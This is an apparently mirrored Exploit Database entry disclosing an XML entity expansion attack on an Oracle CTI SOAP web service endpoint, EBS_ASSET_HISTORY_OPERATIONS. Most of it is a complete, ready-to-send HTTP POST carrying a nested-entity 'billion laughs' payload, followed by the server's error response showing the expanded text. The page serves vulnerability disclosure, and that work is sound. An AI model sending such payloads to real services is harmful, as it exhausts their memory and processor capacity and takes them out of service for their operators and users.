Oracle CTI Web Service – ‘EBS_ASSET_HISTORY_OPERATIONS’ XML Entity Injection

• Exploit Database
• 13 阅读

• 作者： omurugur
  日期： 2019-05-21
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/46885/

• # Exploit Title: Oracle CTI Web Service XML Entity Exp.
  # Exploit Author: omurugur
  # Author Web: https://www.justsecnow.com
  # Author Social: @omurugurrr
  
  URL : http://server/EBS_ASSET_HISTORY_OPERATIONS
  
   
  
  As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.
  
  10kb more request is returned.
  Examples Request;
  
   
  
  POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1
  
  Accept-Encoding: gzip, deflate
  
  Content-Type: text/xml;charset=UTF-8
  
  SOAPAction: "getCampaignHistory"
  
  Content-Length: 1696
  
  Host: ****
  
  User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
  
  Connection: close
  
  
  <!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS" xmlns:ave="http://server/AveaFrameWo&ha6;rk">
  
  <soapenv:Header/>
  
  <soapenv:Body>
  
   <ebs:EbsRetrieveWebChatHistoryRequest>
  
   <ave:RequestHeader>
  
   <ave:RequestId>
  
  <ave:GUID>152069827209115206982720</ave:GUID>
  
   </ave:RequestId>
  
   <ave:CallingSystem>SIEBEL</ave:CallingSystem>
  
   <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId>
  
   </ave:RequestHeader>
  
   <ebs:RequestBody>
  
   <ebs:msisdn>5051234567</ebs:msisdn>
  
   </ebs:RequestBody>
  
   </ebs:EbsRetrieveWebChatHistoryRequest>
  
  </soapenv:Body>
  
  </soapenv:Envelope>
  
   
  ExampleResponse1;
  
  
  HTTP/1.1 500 Internal Server Error
  
  Date: Tue, 17 Apr 2018 06:33:07 GMT
  
  Content-Type: text/xml; charset=utf-8
  
  X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df
  
  X-ORACLE-DMS-RID: 0
  
  Connection: close
  
  Content-Length: 328676
  
   
  
  <?xml version="1.0" encoding="UTF-8"?>
  
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header xmlns:ave="http://server/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha
  
  ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul="http://server/Fault"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>